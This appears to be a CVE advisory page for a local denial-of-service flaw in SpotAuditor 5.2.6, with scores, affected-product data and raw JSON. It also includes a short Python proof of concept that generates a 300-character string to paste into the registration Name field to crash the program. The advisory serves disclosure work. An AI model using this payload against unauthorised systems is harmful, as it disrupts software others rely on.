Security Vulnerability Report
CVE-2019-25596 CVSS 6.2 MEDIUM

CVE-2019-25596

Published: 2026-03-22 14:16:27
Last Modified: 2026-03-23 19:51:23

Description

SpotAuditor 5.2.6 contains a denial of service vulnerability in the registration dialog that allows local attackers to crash the application by supplying an excessively long string in the Name field. Attackers can paste a buffer of 300 repeated characters into the Name input during registration to trigger an application crash.

CVSS Details

CVSS Score: 6.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:nsasoft:spotauditor:5.2.6:*:*:*:*:*:*:* - VULNERABLE
SpotAuditor 5.2.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Proof of Concept for CVE-2019-25596
# This script generates a payload to crash SpotAuditor 5.2.6


def generate_dos_payload():
    # Create a buffer with 300 repeated characters
    # This triggers the crash in the registration dialog Name field
    payload = "A" * 300
    return payload


if __name__ == "__main__":
    exploit = generate_dos_payload()
    print(f"Generated Payload: {exploit}")
    print("Paste this string into the Name field of SpotAuditor 5.2.6 registration dialog to trigger the DoS.")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25596", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:26.613", "lastModified": "2026-03-23T19:51:23.053", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SpotAuditor 5.2.6 contains a denial of service vulnerability in the registration dialog that allows local attackers to crash the application by supplying an excessively long string in the Name field. Attackers can paste a buffer of 300 repeated characters into the Name input during registration to trigger an application crash."}, {"lang": "es", "value": "SpotAuditor 5.2.6 contiene una vulnerabilidad de denegación de servicio en el diálogo de registro que permite a atacantes locales bloquear la aplicación al proporcionar una cadena excesivamente larga en el campo Nombre. Los atacantes pueden pegar un búfer de 300 caracteres repetidos en la entrada Nombre durante el registro para provocar un bloqueo de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nsasoft:spotauditor:5.2.6:*:*:*:*:*:*:*", "matchCriteriaId": "DB920581-C435-4A80-BCE5-F6391BC860BD"}]}]}], "references": [{"url": "http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://www.exploit-db.com/exploits/46778", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/spotauditor-name-field-denial-of-service", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}